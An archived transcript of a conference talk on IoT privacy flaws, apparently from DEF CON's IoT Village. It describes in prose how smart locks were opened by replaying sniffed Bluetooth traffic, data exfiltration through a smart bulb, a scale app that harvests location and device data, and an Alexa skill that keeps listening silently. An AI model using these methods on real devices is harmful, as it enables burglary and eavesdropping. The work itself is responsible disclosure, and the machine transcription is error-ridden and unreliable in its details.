IoT VILLAGE - Your Smart Scale is Leaking More than Your Weight

Video thumbnail (Frame 0) Video thumbnail (Frame 777) Video thumbnail (Frame 1641) Video thumbnail (Frame 2723) Video thumbnail (Frame 3677) Video thumbnail (Frame 8828) Video thumbnail (Frame 10052) Video thumbnail (Frame 10869) Video thumbnail (Frame 11753) Video thumbnail (Frame 12369) Video thumbnail (Frame 13047) Video thumbnail (Frame 13822) Video thumbnail (Frame 15094) Video thumbnail (Frame 17059) Video thumbnail (Frame 18563) Video thumbnail (Frame 19256) Video thumbnail (Frame 19884) Video thumbnail (Frame 24210) Video thumbnail (Frame 25554) Video thumbnail (Frame 29177) Video thumbnail (Frame 29954) Video thumbnail (Frame 30794) Video thumbnail (Frame 31839) Video thumbnail (Frame 32845) Video thumbnail (Frame 33786) Video thumbnail (Frame 34945) Video thumbnail (Frame 38664) Video thumbnail (Frame 39498) Video thumbnail (Frame 40203) Video thumbnail (Frame 43190) Video thumbnail (Frame 45668)
Video in TIB AV-Portal: IoT VILLAGE - Your Smart Scale is Leaking More than Your Weight

Formal Metadata

IoT VILLAGE - Your Smart Scale is Leaking More than Your Weight
Privacy Issues in IoT
Title of Series
CC Attribution 3.0 Unported:
You are free to use, adapt and copy, distribute and transmit the work or content in adapted or unchanged form for any legal purpose as long as the work is attributed to the author in the manner specified by the author or licensor.
Release Date

Content Metadata

Subject Area
Cheaper devices that consume less power - What more can you ask for? SECURITY!. Based on multiple tests we have done across a variety of devices, we can conclude that there are still many vendors who lack the security awareness and fail to protect their users. All tested devices were vulnerable to various degrees: A smart scale, a smart lock, a smart band, a smart light bulb and even Amazon’s Alexa. Live demos included!
Data mining Context awareness Information privacy Information privacy
Link (knot theory) Link (knot theory) Multiplication sign Bit Musical ensemble Gamma function Disk read-and-write head Metropolitan area network Disk read-and-write head Twitter
Point (geometry) Implementation Game controller Group action 1 (number) Combinational logic Control flow Limit (category theory) Mathematical analysis Information privacy Number Leak Local Group Goodness of fit Computer configuration Finitary relation Information Information security Self-organization Information Software developer State of matter Mathematical analysis Physicalism Bit Control flow Leak Information privacy Computer configuration Self-organization Right angle Information security Resultant Window
Single-precision floating-point format 1 (number) Information security Information privacy Information security Information privacy
Scripting language Game controller Scripting language Interface (computing) Plastikkarte Shape (magazine) Berner Fachhochschule / Technik und Informatik Control flow Fuzzy logic Cartesian coordinate system
Computer file Oval Personal digital assistant Code Digitizing Cartesian coordinate system Number
Multiplication sign Plastikkarte
Proxy server Demo (music) Right angle Bit Right angle Mereology Information privacy Proxy server
Message passing Musical ensemble Message passing
Implementation Software Encryption Encryption Vulnerability (computing)
Mobile app Weight Real number Weight Plastikkarte Client (computing) Client (computing) Plastikkarte Leak
Internetworking Blu-ray Disc Weight Android (robot) State of matter File system Plastikkarte RAID Leak
Asynchronous Transfer Mode Mobile app Server (computing) Functional (mathematics) Dependent and independent variables Weight Real number Plastikkarte Mereology Product (business) Leak Data model Mathematics Operator (mathematics) Encryption Energy level Software testing Information Endliche Modelltheorie Address space Dependent and independent variables Information Server (computing) Weight Operator (mathematics) Bit Group action Product (business) Function (mathematics) Right angle Functional (mathematics) Address space
Computer virus Sensitivity analysis Connected space Malware Building Software Computer network Physical system
Metre Computer virus Android (robot) Simulation Mobile app 1 (number) Distance Graph coloring Neuroinformatik Band matrix Wave Daylight saving time Series (mathematics) Window
Group action Personal Assistant Personal digital assistant Hacker (term) Execution unit Software cracking Information security Maß <Mathematik>
Bit rate Computer configuration Multiplication sign Calculation Data storage device Point cloud Planning Cartesian coordinate system Point cloud
Group action Link (knot theory) Dependent and independent variables Software developer Complete metric space Mereology Event horizon Template (C++) 2 (number) Latent heat Different (Kate Ryan album) String (computer science) Single-precision floating-point format Flag Category of being Social class Point cloud Dependent and independent variables Software developer Java applet Length Motion capture Latent heat Word Partial derivative output Point cloud Cycle (graph theory) Quicksort Row (database) Flag
Demo (music) Musical ensemble
Multiplication sign Information privacy
Service (economics) Mobile app Dependent and independent variables Service (economics) Identifiability Data storage device Content (media) Sound effect Digital signal Information privacy Product (business) Information privacy Embedded system Type theory Sign (mathematics) Roundness (object) Bit rate Personal digital assistant Quicksort Information security System identification Information security
Context awareness Process (computing) Multiplication sign Control flow Normal (geometry) output Information privacy Information privacy Neuroinformatik Vulnerability (computing) Thomas Bayes
for those of you who attended the last talk and mine is not going to be that low-level it's going to be like poetry compared to it I'm here to discuss privacy issues in IOT to see how privacy issues look like and probably and hopefully to bring some awareness to that and send you out with the knowledge so let's start so the left one is me
[Music] another guy who worked with me on the on the research his name is David sofas very talented man follow him on Twitter we both work at check marks I'm the head of absurd research of check marks this is my details to contact me if you have any questions after the talk if you want to connect that be more than happy to do that I know some people don't like to ask questions in a crowd so this is a good way to catch me okay so I'm
starting with some assumptions I'm assuming you're familiar with basics of Bluetooth and Bailey and assuming you're familiar with the attacks on this kind of technologies I'm assuming you're going to be cool with over simplifications that I'm going to do we don't have time to talk about every single thing so I'm going to lie a bit and I'm assuming you will want some links to the tools and methodologies that I'm going to show because I'm not going to discuss them in depth just to show them so I promised to publish everything that you will need so let's
start with the agenda I'm going to describe a bit of privacy what is it and what is it good for em we'll show some IOT privacy leaks as a result of both implementations we'll do the same with malicious intent of thieves and vendors we'll talk about one very nice privacy leak we made with the high-end IOT spoiler Amazon Alexa echo dot and I'm saying that so you'll stay and some takeaways so let's talk
about privacy we always start with a good book Wikipedia to describe things so privacy is the ability of an individual or group to seclude themselves or information about themselves and thereby expressing themselves selectively so there are some points in there that are very important to privacy one of them is the right to be let alone yes it is a thing the option to limit some access to information to private information secrecy control over your information about oneself obviously about oneself about where you walk or your employees information as well etc so why what are the reasons that people have vendors developers if they're legitimate or not to take one's privacy first is security if I tell you that one of you is the terrorist and I need to check each and every one of you this is a good reason to do that maybe maybe to get something physical if I can break into your house or any other private place you have I can steal things I can take things get private information there are a few aspects of private information and that I can gain from getting your personal information it worth a lot of money as we know these days maybe some information about organizations behavior analysis all these are worth money and also sometimes because I lack the interest of actually making sure that your privacy is kept I think this is one of the most common issues actually what does it take from a person to forfeit his privacy also security at the top place people believe that if they're letting themselves being groped at the airport makes it means that the flight will be okay then they argue to it sentences like I have nothing to hide I'm sure you heard it from people try to ask these people some personal questions like maiden number date of birth and their sexual preferences and you'll see that suddenly they do have stuff to hide sometimes laziness I don't care I don't read the what I'm clicking on it doesn't really matter ignorance from people who doesn't really know what they might lose and the terrible of all convenience if I can let Google know where I'm going and just wait for them to let me know where I should eat so what I should pack in my suitcase then I'm willing to forfeit my privacy and then comes IOT and breaks everything because it has all the reasons to take one's privacy all the reason to forfeit one's privacy and obviously lack of interest one side of the windows and convenience on the side of the users is a really really bad combination so what we did we gathered a
lot of IOT devices some are really ridiculous here on top you can see a Bluetooth pacifier I gave you not people are putting Bluetooth in their babies mouths now every single device at the privacy issue again every single device we did not manage to find even one device or lacking any problems cheap cheap ones expensive ones no matter where they were manufactured and made in the u.s. made in China all the same every single device this is a scary thing let's start with
the physical security a lock a bluetooth
lock they come in many shapes and sizes and none of them stays closed none of them and that's amazing its first of all probably if I would hack this thing it would be with a plier but still people want to use it for small things I guess it's the same with houses
the two really effective ways to break a smart lock HTI snooping is I think most of the locks actually broke with this method it's really an easy method easy as 1-2-3 you enable HDI log in your phone you use the application that's supposed to open the lock you extract relevant data using pcap Wireshark and then use a script to replay or fuss extremely easy again this is how you use
HDI run the application and then look at
it pick up files in this case you can immediately see well maybe you can't but I can see that the code is a six digit number obviously very easily fast like
in this example it is locked and here it is not and this is the time it takes not more than that almost all locks you checked so another
for those that this method did not work we actually had to work a bit harder we use the middle a many the middle attack I tried to make that to make a live demo for it but the atmosphere it is to to therapy so it really didn't work so we'll just keep it at that you run a proxy between the device and the lock extract relevant data replay and the lock opens you'll remember the right to
be let alone that nice thing that part of privacy this is not something you can
do if you have this kind of a smart band
Anonymous smart band will tried several of those again we will not let you alone
again faking messages using the same methods it's really scary it's really scary I'm just faking it message that's it nothing nothing more than that so why
is it so easy why is it so easy well two things two to two reasons one is lack of encryption an IOT a ble device vendor they either do not implement at all encryption or they use deprecated methods or they use them wrong encryption is sometimes complicated but if you don't care it makes it even more complicated this really allows easily to sniff either passively or by doing a man-in-the-middle attack the second thing is using very weak pairing methods methods like just works and passkey read about it it's really deprecated it's really old there are way better methods these days it should be used so why not make it better again it's cheaper don't need to change anything I have the same software for four years now if it's cheaper I can sell more vendors come and go very quickly some of them don't really have names just imaginary names zero liability and people keeps buying anyway no matter what so why bother so this is
when you implement in a negligent way what about malicious we actually this is this was kind of surprising because we didn't really aim at finding something like that we thought that just bad implementation is what we're going to see all over the place and then we took
a smart scale by a eg the reason we took a smart scale by aeg is because we try to get serious and not always no-name IOT devices that we used before AEG is German nothing more serious than that also it was in white or black who took the black very serious so the scale was AEG but the app that came with it not so much it wasn't with the AEG the
app was by someone called V Trump a Chinese company among their clients are AG Texas Instruments and real tech seems legit nothing to suspect and we didn't so we started by installing the app like any other user who needs to check his weight maybe sometimes and then we got
all these permissions all these needed permissions it's not that bad I mean it's a bit weird that a smart scale would need to be able to mount and unmount file systems maybe we started to kind of suspect but we kind of understood what's going on and when
checking the the traffic first of all they didn't really try to hide anything because the host I don't know if you can see it it's called gather dot Lotus sitcom they actually gather things and then it was pretty horrible to to notice
that the app connects to a server in China and sends the following info IMEI Wi-Fi a ID phone operator phone brand and model Wi-Fi Wi-Fi of your house and phone MAC address latitude longitude and obviously your weight this is just to make it insulting after all the data so it's not my mistake this is not negligent right you actually made a lot of work to gather all this information so we try to get responses from all the previous devices we didn't manage to get any response because I don't think it's real companies so just skip the part but here we did have real companies right agian Vikram so AG said reaction products with priority whenever we believe it is necessary I think they didn't believe it is necessary because I could never manage to contact them again or get any response so this is the response we left with the Trump on the other hand and said their app functionality does require these permissions I mean they ignored completely what the second part of all the information that is sent they only talked about the permissions and obviously they decided not to change anything and this is what they told us but they did make some changes just a little before this lecture we checked again they made changes first of all they change the host so it's not gather something something calm and it's now just a bunch of characters calm the second thing they did is they added encryption so it's it's actually mitigating the penetration testers it's mitigating the researchers because they didn't want us to see what what they're sending they did it really bad and we did check they actually sending the same thing not that important and this is an aeg that you would probably think that you should trust
let's go a bit high level towards not personal but maybe cooperate military ever no other uses excavation
so everyone knows what air gap is everyone who knows what air gap is please raise your hand okay that's quite an amount so air gap is being used for highly sensitive data it's disconnected from outside network completely supposed to be completely disconnected things can get in no problem it's an assumption that some viruses or malware will go into the system and that's let's say it's not okay but it's okay but nothing gets out so no matter what nothing gets out and less using a six 50 smart light
bulb in your building base room whatever what we did here on the left side you
can see well let's start on the right side on the right side you see simulation of the computer who has let's say valuable virus and this virus Omar well I found out that there is a smart light bulb somewhere in the vicinity connects to it and start accelerating data through the blinking of light bulb that's it on the left you can see the app we did for Android that it will start gather the blinks and make them into letters it's very sterile here because it's just aimed at the wall at the white wall I don't know why it's blue but it's it's white wall believe me we actually tested it from a distance of 100 meters with the telescope during daylight to a window it also works you can see start blinking and soon you can start interrupting interpreting the data as you can see just ones and zeroes nothing nothing fancy some of you probably say it's not really effective because the victim actually sits in a room and the light blinks he should be suspecting something sometimes we actually do the same thing with only blue eye blue wave lights it cannot be seen in the eye but every camera catches it obviously we can do it multi-layer with several with several colors if you want larger wider banded bandwidth but this is enough for the POC and it was kind of funny to do something to a telescope during the daylight and we didn't look crazy at all by the way doing it okay so the same person who
said yeah but the guy says it's blinking also is saying yeah but this is all just cheap crappy devices and he's right so we tried something else we went for Alexa and we went for Alexa because it's the least cheapest crappiest device we could find Amazon echoes the series most
sold intelligent personal assistant by the end of 2017 45 million units were sold I'm pretty sure some more so since then popularity rose in last year's so is the fear of being recorded or listened to unknowingly and we wanted to show that the fear is totally justified so we started checking it what we wanted
is to turn our echo dot into a tapping device we're coming from upset vacation security so we don't like soldiering and we don't like and I don't know some dirt on our hands so we decided to do it remotely we thought it would be easier for us because I think that in the in the last couple of years a couple of groups managed to do some hacks and cracks by actually having contact with the echo so we try to do something remotely the first challenge
was actually the activation challenge because Alexa is asleep until you wake her up she only starts streaming audio to the cloud after the wake up for the LexA is her this is something that it's very hard to do remotely unless you shout really hard so our solution was to start after after the user rates are up usually happens several times a day I guess for users we had several options how to do that not to go into it very
deep we decided to use Alexa skills Alexa skill is like an application that is run by Alexa it can be either built-in or you can download it for a dedicated alexey store and we thought it would be a really nice to create a malicious one something that starts benign like a calculator that you asked him how much is 1+1 and you get the answer and you don't suspect anything but Alexa will then continue to record you so this was the grand plan the
second challenge came quite quickly because we couldn't keep the session alive after but the benign part so Alexa gives the answer and then she goes to sleep again she shuts down or if you tell her to to stay she prompt the user so the partial solution a flag that we found I mean it's a normal flag it said before flag should end session if you mentioned that you should not end session then Alexa goes into another cycle another session but Alexa will prompt the user that she's again waiting for a response so this is kind of problematic because the users of Alex are very smart and they will know that something is going on so the
complete solution came from a class that is called very prompt we said what if we try and put an empty string in we prompt well complete silence so that was pretty cool we managed to keep the sessions coming without Alexa saying anything to the user so that was the first challenge that was so the second challenge episode the third challenge was to actually get the data to the malicious developer and the actual recording is not accessible when the developers it's uploaded to the cloud but the transcription generated by Amazon is accessible usually the developer needs to choose a specific group of words which they call the world slot for example if you write if you put cities Alexa expects to get some sort of city name in your mumblings names animals you get the gist so our solution was to create a custom world slot that will get everything whatever is said Alexa will try to guess what is the closest word to it and we actually created a custom one we called it input and this world slot would capture any single world but we wanted sentences not single word because if the user says a single world word and then goes to another cycle then we probably missed the ten words in the sentence so we actually created templates for different sentences with all Lenten events of sentence we could think of we could think of 15 I don't know why maybe you have a bigger vocabulary and you can make sentences of more than 15 words we couldn't so every sentence that is no more than 15 words will be captured by Alexa transcribe and be sent to the malicious user okay so i'll give a link
to the demo later sorry about that
[Applause] very great proud okay so that guy from before from earlier who pointed out things he probably is saying now what
about the blue light the blue light is on all the time and he's right but it
doesn't matter much and actually we thought it lowered the the effectiveness of the of the attack of the malicious app but Amazon didn't think so Amazon thought it's it's still work it's still bad and they said that the users of intelligent private assistant are not expected to keep an eye content with the device so the blue light is not expected to be there also and this was actually news for us there is something called Alexa voice services which allows any vendor with some sort of IOT to embed Alexa capabilities into the probably lightless products if I make a teapot or frigerator with the leg sign it I don't have to put any light so this does not lower the risk here amazon responds and they ask that we read it customer trust is important to us and we take security and privacy seriously we have put mitigation in place for detecting this type of skill behavior reported by check marks and this came from the security team at lab 126 in Amazon actually it was amazing working with these guys and they gave us very rapid responses we collaborated with them the entire way with the fixes and they decided to make the following mitigations detect and disallow empty rate prompts there's no use of that feature identify user roping skills that are uploaded to the store and they didn't really give us more details but obviously they're on it and detect lower than usual sessions and act appropriately so this is kind of great
quick round of takeaways and I'm sorry
if I'm getting a bit preachy but it's important so it's very easy to forget that IOT devices are actually computers who has inputs and outputs cameras ears and eyes whatever really users normal users everyday users do not really think that their bay may be a privacy breach in stuff they wear all the time the breaches as we said sometimes it's because the device sucks sometimes it's because it's malicious but always because the users allow it so privacy issues are a layer 8 problem only users can solve it by making sure that they buy only trusted devices by making it very clear to the vendors that vulnerable devices will stay on the shelves and by making it very clear to vendors that found vulnerabilities must be fixed quickly your job supposed to write it down talk to users please talk to vendors if it's possible educate and bring awareness privacy issues are a really big problem break as many IOT devices as possible and publish your findings no matter how small they are awareness please and that's it